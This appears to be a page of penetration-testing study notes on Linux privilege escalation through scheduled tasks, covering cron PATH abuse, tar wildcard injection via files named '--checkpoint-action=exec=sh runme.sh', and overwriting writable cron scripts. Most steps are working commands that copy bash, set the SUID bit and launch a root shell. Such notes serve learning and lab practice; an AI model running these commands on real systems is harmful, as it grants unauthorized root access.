Buy me a tea

Scheduled tasks

Cron Path

Enumeration

  • We have to check in the crontab for example with cat /etc/crontab if we can not read this file we still could check other ways to enumerate scheduled task using payload all the things documentation or an enumeration tool like linpeas

  • So we can try to create a file named overwrite.sh and make it escalate privileges

Exploitation

  • echo 'cp /bin/bash /tmp/bash; chmod +x /tmp/bash' > /home/user/overwrite.sh we create our overwrite file. Our script will create a bash with suid priv

  • chmod +x /home/user/overwrite.sh we need to make it executable

Cron Wildcards

Enumeration

  • The script goes to the user home and makes a backup of the content using a wildcard * and stores it in tmp

  • We can not modify the script so we need to do something that uses the script to get our privesc. In order to do so we can do command related to tar as the script uses it.

Exploitation

  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh we create a malicious bash

  • touch /home/user/--checkpoint=1 when the scheduled script is going to read the home directory it will have a file named as a tar command, so it will interpret it. This command displays a status message every 1

  • touch /home/user/--checkpoint-action=exec=sh\ runme.sh then this command is going to make and action when the checkpoint we created before is hit

  • After a minute we can then launch our bash /tmp/bash -p

Cron files overwrite

Enumeration

  • We locate where is the file using locate overwrite.sh

  • We can overwrite it

Exploitation

  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh We are overwriting the file with a command that will copy bash and give it suid perms

  • After a minute we should be able to launch /tmp/bash -p

PreviousCapabilitiesNextNFS Root Squashing

Last updated